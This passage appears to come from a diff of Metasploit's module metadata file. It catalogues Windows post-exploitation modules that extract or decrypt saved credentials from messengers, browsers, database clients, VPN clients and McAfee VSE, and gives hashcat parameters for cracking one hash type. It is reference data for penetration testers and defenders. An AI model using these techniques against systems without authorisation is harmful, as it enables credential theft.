and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Incredimail credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/incredimail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/incredimail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/kakaotalk": { - "name": "KakaoTalk credential gatherer", - "fullname": "post/windows/gather/credentials/kakaotalk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for KakaoTalk credentials on a Windows host. KakaoTalk is a popular mobile messaging app most widely used in South Korea.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/kakaotalk.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/kakaotalk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/kmeleon": { - "name": "Kmeleon credential gatherer", - "fullname": "post/windows/gather/credentials/kmeleon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for K-meleon credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/kmeleon.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/kmeleon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/line": { - "name": "LINE credential gatherer", - "fullname": "post/windows/gather/credentials/line", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in LINE desktop application on a remote Windows host. LINE is the most popular Instant Messenger app in Japan.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/line.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/line", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/maxthon": { - "name": "Maxthon credential gatherer", - "fullname": "post/windows/gather/credentials/maxthon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Maxthon credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/maxthon.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/maxthon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mcafee_vse_hashdump": { - "name": "McAfee Virus Scan Enterprise Password Hashes Dump", - "fullname": "post/windows/gather/credentials/mcafee_vse_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Mike Manzotti ", - "Maurizio inode Agazzini" - ], - "description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n format is available for John the Ripper at the referenced URL.", - "references": [ - "URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mcafee_vse_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mdaemon_cred_collector": { - "name": "Windows Gather MDaemonEmailServer Credential Cracking", - "fullname": "post/windows/gather/credentials/mdaemon_cred_collector", - "aliases": [], - "rank": 600, - "disclosure_date": null, - "type": "post", - "author": [ - "Manuel Nader #AgoraSecurity" - ], - "description": "Finds and cracks the stored passwords of MDaemon Email Server.", - "references": [ - "BID-4686" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mdaemon_cred_collector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/meebo": { - "name": "Windows Gather Meebo Password Extractor", - "fullname": "post/windows/gather/credentials/meebo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sil3ntDre4m ", - "Unknown" - ], - "description": "This module extracts login account password stored by\n Meebo Notifier, a desktop version of Meebo's Online Messenger.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/meebo.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/meebo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/miranda": { - "name": "Miranda credential gatherer", - "fullname": "post/windows/gather/credentials/miranda", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Miranda credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/miranda.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/miranda", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/moba_xterm": { - "name": "Windows Gather MobaXterm Passwords", - "fullname": "post/windows/gather/credentials/moba_xterm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module will determine if MobaXterm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-MobaXterm-0b976b993c87401598be4caab8cbe0cd" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/moba_xterm.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/moba_xterm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mremote": { - "name": "Windows Gather mRemote Saved Password Extraction", - "fullname": "post/windows/gather/credentials/mremote", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine ", - "hdm ", - "mubix " - ], - "description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. The module will extract the connection\n info and decrypt the saved passwords.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/mremote.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mremote", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mssql_local_hashdump": { - "name": "Windows Gather Local SQL Server Hash Dump", - "fullname": "post/windows/gather/credentials/mssql_local_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Mike Manzotti ", - "nullbind" - ], - "description": "This module extracts the usernames and password\n hashes from an MSSQL server and stores them as loot. It uses the\n same technique in mssql_local_auth_bypass.", - "references": [ - "URL-https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mssql_local_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/navicat": { - "name": "Windows Gather Navicat Passwords", - "fullname": "post/windows/gather/credentials/navicat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "HyperSine", - "Kali-Team " - ], - "description": "This module will find and decrypt stored Navicat passwords.", - "references": [ - "URL-https://github.com/HyperSine/how-does-navicat-encrypt-password", - "URL-https://blog.kali-team.cn/Metasploit-Navicat-fbc1390cf57c40b5b576584c48b8e125" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/navicat.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/navicat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/nimbuzz": { - "name": "Windows Gather Nimbuzz Instant Messenger Password Extractor", - "fullname": "post/windows/gather/credentials/nimbuzz", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sil3ntdre4m ", - "Unknown" - ], - "description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/nimbuzz.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/nimbuzz", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/opera": { - "name": "Opera credential gatherer", - "fullname": "post/windows/gather/credentials/opera", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Opera credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/opera.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/opera", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/operamail": { - "name": "Operamail credential gatherer", - "fullname": "post/windows/gather/credentials/operamail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Operamail credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/operamail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/operamail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/outlook": { - "name": "Windows Gather Microsoft Outlook Saved Password Extraction", - "fullname": "post/windows/gather/credentials/outlook", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Justin Cacak" - ], - "description": "This module extracts and decrypts saved Microsoft\n Outlook (versions 2002-2010) passwords from the Windows\n Registry for POP3/IMAP/SMTP/HTTP accounts.\n In order for decryption to be successful, this module must be\n executed under the same privileges as the user which originally\n encrypted the password.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/outlook.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/outlook", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/plsql_developer": { - "name": "Windows Gather PL/SQL Developer Connection Credentials", - "fullname": "post/windows/gather/credentials/plsql_developer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Adam Caudill", - "Jemmy Wang" - ], - "description": "This module can decrypt the histories and connection credentials of PL/SQL Developer,\n and passwords are available if the user chooses to remember.", - "references": [ - "URL-https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-11-09 13:58:14 +0000", - "path": "/modules/post/windows/gather/credentials/plsql_developer.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/plsql_developer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/postbox": { - "name": "Postbox credential gatherer", - "fullname": "post/windows/gather/credentials/postbox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Postbox credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/postbox.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/postbox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/pulse_secure": { - "name": "Windows Pulse Secure Connect Client Saved Password Extractor", - "fullname": "post/windows/gather/credentials/pulse_secure", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Quentin Kaiser " - ], - "description": "This module extracts and decrypts saved Pulse Secure Connect Client passwords from the\n Windows Registry. This module can only access credentials created by the user that the\n Meterpreter session is running as.\n Note that this module cannot link the password to a username unless the\n Meterpreter sessions is running as SYSTEM. This is because the username associated\n with a password is saved in 'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\[SID].dat',\n which is only readable by SYSTEM.\n Note that for enterprise deployment, this username is almost always the domain\n username.", - "references": [ - "CVE-2020-8956", - "URL-https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials", - "URL-https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store", - "URL-https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/credentials/pulse_secure.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/pulse_secure", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/purevpn_cred_collector": { - "name": "Windows Gather PureVPN Client Credential Collector", - "fullname": "post/windows/gather/credentials/purevpn_cred_collector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Manuel Nader #AgoraSecurity" - ], - "description": "Finds the password stored for the PureVPN Client.", - "references": [ - "URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Credential-Leak-Flaws-in-Windows-PureVPN-Client/", - "URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-010/?fid=11779" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/purevpn_cred_collector.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/purevpn_cred_collector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/qq": { - "name": "QQ credential gatherer", - "fullname": "post/windows/gather/credentials/qq", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for QQ credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/qq.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/qq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/quassel_irc": { - "name": "Quassel IRC credential gatherer", - "fullname": "post/windows/gather/credentials/quassel_irc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Quassel IRC Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/quassel_irc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/quassel_irc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/razer_synapse": { - "name": "Windows Gather Razer Synapse Password Extraction", - "fullname": "post/windows/gather/credentials/razer_synapse", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Thomas McCarthy \"smilingraccoon\" ", - "Matt Howard \"pasv\" ", - "Brandon McCann \"zeknox\" " - ], - "description": "This module will enumerate passwords stored by the Razer Synapse\n client. The encryption key and iv is publicly known. This module\n will not only extract encrypted password but will also decrypt\n password using public key. Affects versions earlier than 1.7.15.", - "references": [ - "URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/", - "URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/razer_synapse.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/razer_synapse", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/razorsql": { - "name": "Windows Gather RazorSQL Credentials", - "fullname": "post/windows/gather/credentials/razorsql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Paul Rascagneres ", - "sinn3r " - ], - "description": "This module stores username, password, type, host, port, database (and name)\n collected from profiles.txt of RazorSQL.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/razorsql.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/razorsql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/rdc_manager_creds": { - "name": "Windows Gather Remote Desktop Connection Manager Saved Password Extraction", - "fullname": "post/windows/gather/credentials/rdc_manager_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tom Sellers " - ], - "description": "This module extracts and decrypts saved Microsoft Remote Desktop\n Connection Manager (RDCMan) passwords the .RDG files of users.\n The module will attempt to find the files configured for all users\n on the target system. Passwords for managed hosts are encrypted by\n default. In order for decryption of these passwords to be successful,\n this module must be executed under the same account as the user which\n originally encrypted the password. Passwords stored in plain text will\n be captured and documented.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/rdc_manager_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/redis_desktop_manager": { - "name": "RedisDesktopManager credential gatherer", - "fullname": "post/windows/gather/credentials/redis_desktop_manager", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for RedisDesktopManager credentials on a Windows host.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-PackRat-RedisDesktopManager-42dc7ab063f040d182da0f1fc16db74e" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/redis_desktop_manager.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/redis_desktop_manager", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/safari": { - "name": "Safari credential gatherer", - "fullname": "post/windows/gather/credentials/safari", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for safari credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": 